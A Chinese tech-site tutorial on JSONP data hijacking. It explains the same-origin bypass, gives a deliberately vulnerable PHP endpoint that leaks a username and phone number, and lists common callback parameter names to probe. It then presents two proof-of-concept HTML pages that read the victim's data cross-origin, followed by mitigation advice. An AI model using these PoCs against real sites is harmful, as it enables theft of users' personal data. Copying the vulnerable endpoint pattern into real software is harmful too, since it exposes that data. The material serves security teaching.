位置: IT常识 - 正文

JSONP数据劫持漏洞(json解析漏洞)

编辑:rootadmin
JSONP数据劫持漏洞 ​介绍

推荐整理分享JSONP数据劫持漏洞(json解析漏洞),希望有所帮助,仅作参考,欢迎阅读内容。

文章相关热门搜索词:json劫持漏洞验证方法,json数据解析错误是什么意思,json数据解析错误是什么意思,jsonp漏洞利用,json loads dumps,jsonp漏洞利用,json劫持漏洞验证方法,json劫持怎么防止,内容如对您有帮助,希望把文章链接给更多的朋友!

JSONP(JSON with Padding)是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据;它利用的是script标签的 src 属性不受同源策略影响的特性,使网页可以得到从其他来源动态产生的 json 数据,因此可以用来实现跨域读取数据。

更通俗的说法:JSONP 就是利用 <script> 标签的跨域能力实现跨域数据的访问,请求动态生成的 JavaScript 脚本同时带一个 callback 函数名作为参数。服务端收到请求后,动态生成脚本产生数据,并在代码中以产生的数据为参数调用 callback 函数。

漏洞原理

和 CSRF 类似,都需要用户交互,而 CSRF 主要是以用户的账户进行增删改的操作,jsonp 则主要用来劫持数据。

当网站通过 JSONP 方式传递用户敏感信息时,攻击者可以伪造 JSONP 调用页面,诱导被攻击者访问来达到窃取用户信息的目的;jsonp 数据劫持就是攻击者获取了本应该传给网站其他接口的数据。

漏洞代码

假设这是目标网站上的代码,然后我们利用漏洞就可以劫持到里面的数据,如username、phone

<?php//test.phpheader('Content-type: application/json');$callback = $_GET['callback'];print $callback.'({"username" : "d4m1ts","phone" : "13888888888"});';?>

快速启动 php 环境

php -S 127.0.0.1:9999 实现效果

利用场景

如上图,所有包含有callback等回调函数的,且请求方式为 GET,没有验证 referer 等,都可以尝试下该漏洞

如果返回内容是 json 格式的,但是没有回调函数,我们可以尝试手动添加回调函数去试试运气,一些常见的如下:

_callback=mstkey_cb=mstkeycallback=mstkeycb=mstkeyjsonp=mstkeyjsonpcallback=mstkeyjsonpcb=mstkeyjsonp_cb=mstkeyjson=mstkeyjsoncallback=mstkeyjcb=mstkeycall=mstkeycallBack=mstkeyjsonpCallback=mstkeyjsonpCb=mstkeyjsonp_Cb=mstkeyjsonCallback=mstkeyca=mstkey漏洞利用

当我们发现信息泄露的 jsonp 接口以后,我们需要构造一个恶意 html 页面,然后引诱受害者去访问这个网站,一旦访问了这个网站,脚本就会自动运行,就会向这个接口请求用户的敏感数据,并传送到攻击者的服务器上。

POC基于实现回调函数<script>function xxx(data){ alert(data.username);}</script><script src="http://127.0.0.1:9999/test.php?callback=xxx"></script>JSONP数据劫持漏洞(json解析漏洞)

保存为 html,诱导受害者访问,可见成功获取到了username信息

image-20220322171224615

简而言之:存在信息泄漏的 JSONP 接口http://127.0.0.1:9999/test.php?callback=xxx,攻击者构造 POC 后诱导用户访问 POC,然后就会调用这个接口获取到敏感数据,获取到的敏感数据被攻击者截获了。

另一个 POC基于 jquery<script src="http://cdn.static.runoob.com/libs/jquery/1.8.3/jquery.js"></script><script type="text/javascript"> $.getJSON("http://127.0.0.1:9999/test.php?callback=?", function(data){ alert(data.phone); });</script>

image-20220322173916125

修复建议

扩展

修复建议

接受请求时检查referer来源;

在请求中添加token并在后端进行验证;

严格过滤 callback 函数名及 JSON 里数据的输出。

扩展

如果目标的 header 头没有设置Content-Type为json,而是html,那么也可以造成 XSS 漏洞

一个获取 QQ 号的 JSONP 劫持实例[1]

image-20220322185037473

推荐阅读:JSONP 挖掘与高级利用[2]

参考资料

[1]一个获取 QQ 号的 JSONP 劫持实例: http://www.piaoyi.org/network/get-qq-haoma-js.html

[2]JSONP 挖掘与高级利用: http://drops.xmd5.com/static/drops/papers-6630.html

本文链接地址:https://www.jiuchutong.com/zhishi/299576.html 转载请保留说明!

上一篇:单目测距原理与实现(代码可运行)(单目测距精度)

下一篇:强化学习——Q-Learning算法原理

  • 华为手机怎么进入recovery模式(华为手机怎么进入简易模式)

    华为手机怎么进入recovery模式(华为手机怎么进入简易模式)

  • QQ安全中心qq怎么改密码(qq安全中心怎么操作)

    QQ安全中心qq怎么改密码(qq安全中心怎么操作)

  • 小米9用贴膜吗(小米9买回来是有贴膜的吗?)

    小米9用贴膜吗(小米9买回来是有贴膜的吗?)

  • 微信视频声音变魔音怎么办(微信视频声音变慢变浑厚)

    微信视频声音变魔音怎么办(微信视频声音变慢变浑厚)

  • 华为9x怎么截屏(华为9x截屏怎么操作)

    华为9x怎么截屏(华为9x截屏怎么操作)

  • 钉钉视频会议听不见声音(钉钉视频会议听不到老师声音)

    钉钉视频会议听不见声音(钉钉视频会议听不到老师声音)

  • 笔记本电脑打开后不显示桌面黑屏(笔记本电脑打开软件总是弹出一个是或否)

    笔记本电脑打开后不显示桌面黑屏(笔记本电脑打开软件总是弹出一个是或否)

  • 手机进水指纹不能用了怎么办(手机进水指纹不灵敏)

    手机进水指纹不能用了怎么办(手机进水指纹不灵敏)

  • 二代耳机有线和无线的区别(二代耳机有线和有线区别)

    二代耳机有线和无线的区别(二代耳机有线和有线区别)

  • 如何开淘宝天猫店(如何在淘宝开天猫)

    如何开淘宝天猫店(如何在淘宝开天猫)

  • iphone11pro怎么朗读屏幕(苹果11pro怎么念)

    iphone11pro怎么朗读屏幕(苹果11pro怎么念)

  • 苹果8plus可以不贴膜吗(苹果8plus可以不可以插两张手机卡呢)

    苹果8plus可以不贴膜吗(苹果8plus可以不可以插两张手机卡呢)

  • oppoa57的耳机模式在哪(oppo手机耳机模式)

    oppoa57的耳机模式在哪(oppo手机耳机模式)

  • 怎么看淘宝积分(怎么看淘宝积分多少)

    怎么看淘宝积分(怎么看淘宝积分多少)

  • 直播声卡的主要功能是(直播声卡的主要作用是)

    直播声卡的主要功能是(直播声卡的主要作用是)

  • 荣耀5手环怎么开机(荣耀5手环怎么连接苹果手机)

    荣耀5手环怎么开机(荣耀5手环怎么连接苹果手机)

  • word如何设置字体上标(word如何设置字体下沉)

    word如何设置字体上标(word如何设置字体下沉)

  • 微信拒收红包怎么操作(微信拒收红包怎么恢复)

    微信拒收红包怎么操作(微信拒收红包怎么恢复)

  • qq最近常听能看访客吗(qq最近常听是实时的吗)

    qq最近常听能看访客吗(qq最近常听是实时的吗)

  • ns开机设置(switch开机设置教程日版)

    ns开机设置(switch开机设置教程日版)

  • qq大小船消失规则(qq小船不会消失吗)

    qq大小船消失规则(qq小船不会消失吗)

  • iPhone微信如何发动态表情(苹果微信怎么发)

    iPhone微信如何发动态表情(苹果微信怎么发)

  • 荣耀平板5和华为m5区别(荣耀平板5和华为m3哪个好)

    荣耀平板5和华为m5区别(荣耀平板5和华为m3哪个好)

  • 鸿蒙系统大文件夹怎么玩? 鸿蒙大文件翻页调整大小等操作的技巧(鸿蒙系统大文件夹怎么调节大小)

    鸿蒙系统大文件夹怎么玩? 鸿蒙大文件翻页调整大小等操作的技巧(鸿蒙系统大文件夹怎么调节大小)

  • 筹建期的收入要交企业所得税吗
  • 国税地税电子钥匙价格
  • 个人所得税应补税额怎么办
  • 小微企业应纳税所得额超过300万怎么办
  • 政府会计制度银行存款利息咋处理
  • 出口退税普票
  • 农业免税企业账户怎么查
  • 转登记小规模纳税人留抵税额
  • 偶然所得计税依据 包不包含增值税
  • 超过标准的职工教育经费
  • 工会经费支出无效怎么办
  • 充值费用优惠怎么取消
  • 库存品种
  • 金融企业发放贷款时发生的交易费用
  • 营业外收入需要计提销项税吗
  • 弥补以前年度亏损税局会查吗
  • 餐饮公司如何挣钱
  • 计税收入金额是什么意思
  • 跨年的发票能红字冲销吗?
  • 旅游公司发票企业能报销吗
  • 关于企业所得税若干优惠政策的通知
  • 自建公司什么意思
  • 递延所得税资产怎么计算
  • 公司老板垫付的钱怎么做账
  • 小规模纳税人别人开了专票怎样处理
  • 两年利润都为负数,如何计算完成率
  • 当月已认证的可抵扣增值税
  • win11本地用户和组
  • 用盈余公积弥补职工福利费是什么类型
  • 资产负债表其他流动资产计算公式
  • 公司股权转让怎么操作
  • 咨询服务费需要交印花税吗
  • win10专业版用户名和密码怎么取消
  • 如何做商品批发
  • html和css介绍
  • 国税系统怎么认证发票
  • 划水划水划水表情包
  • 建筑企业其他应付款
  • 帝国cms使用手册
  • 递延所得税资产和所得税费用的关系
  • 如何保护数据库
  • 退回股东投资款现金流怎么选
  • 所得税汇算清缴怎么操作
  • 公司收到拆迁补偿金,于评估公司的区别
  • 单位租的个人房子需要采集房产税源吗
  • 权益性投资收益按照什么确认收入的实现
  • 银行存款收入范围有哪些
  • 定额征收个体户如何交所得税
  • 新开办的企业怎么做账
  • 公司变更名字后,公账怎么办
  • 利润表期初余额怎么填
  • 一般纳税人的进项税额可以抵扣吗
  • 蔬菜公司开具专票可以抵扣吗
  • winxp电脑显示器亮度怎么调
  • macbookpro如何扫描
  • vmwarevmx进程是干嘛的
  • ubuntu和debian哪个稳定
  • win10如何动态桌面
  • ghoststartservice.exe是什么进程 有什么作用 ghoststartservice进程查询
  • ssh permission denied password
  • 跑酷游戏cs
  • cocos creator js ts
  • python如何用turtle
  • 详细谈谈哲学的基本问题
  • android camera preview
  • python int 转 float
  • python生成矩阵的方法
  • vue请求数据再赋值data
  • jquery遍历元素并赋值
  • unity random.value
  • python 判断中文字符
  • javascript post语法
  • 河北税务局是干嘛的
  • 四川4050社保补贴政策什么时候发放
  • 会议服务的服务定位是什么
  • 安置残疾人即征即退
  • 重庆个人税务查询
  • 财税库银后端商户为什么扣钱
  • 云南省国税发票查询真伪查询
  • 税务申报扣除
  • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设